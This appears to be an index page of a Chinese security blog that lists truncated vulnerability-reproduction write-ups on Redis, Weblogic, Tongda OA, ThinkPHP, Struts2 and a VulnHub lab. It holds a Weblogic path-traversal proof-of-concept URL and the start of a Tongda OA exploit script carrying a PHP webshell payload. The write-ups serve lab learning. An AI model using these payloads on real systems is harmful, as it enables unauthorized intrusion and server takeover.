漏洞复现
大碗宽面大又圆
鸡,鸡,鸡你实在是太美!
展开
-
Redis未授权访问漏洞总结
一.漏洞描述Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的c原创 2020-12-15 18:33:59 · 847 阅读 · 0 评论 -
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
环境安装首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo原创 2020-11-04 13:27:41 · 1375 阅读 · 0 评论 -
通达OA 0day RCE漏洞复现
本次测试使用的是通达 OA V11.6版本。给出下载地址,http://www.kxdw.com/soft/23114.html下载好后,直接安装就可以。然后打开登录界面。登录文件有默认密码用某大佬写的EXPimport requests target="http://192.168.0.110/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE原创 2020-08-23 00:50:16 · 795 阅读 · 0 评论 -
Thinkphp框架 5.x远程命令执行漏洞复现
thinkphp 编辑ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。 [1]ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007原创 2020-07-06 17:04:49 · 473 阅读 · 0 评论 -
靶机:Lampiao
下载地址https://www.vulnhub.com/entry/lampiao-1,249/选择NAT模式或桥接模式都可以目标得到root权限信息收集kali的ip是192.168.174.129扫下c段 发现靶机ip 192.168.174.4开启了 22 80端口 进入80端口看下 然后查看页面源代码 没有发现东西dirb扫下目录 发现扫不到东西...原创 2020-07-06 15:36:30 · 768 阅读 · 0 评论 -
Struts2环境搭建及其复现
什么是Struts框架Struts2 是目前较为普及和成熟的基于MVC设计模式的web应用程序框架,它不仅仅是Struts1 的升级版本,更是一个全新的Struts架构。最初,是以WebWork框架和Struts框架为基础,通过提供增强和改进的Struts框架,进而实现简化web技术人员开发工作的目标。不久之后,Webwork框架和Struts社区联合创造了现在流行的Struts2框架。(摘自W3Cschool https://www.w3cschool.cn/struts_2/struts_overvi原创 2020-07-01 15:01:58 · 584 阅读 · 0 评论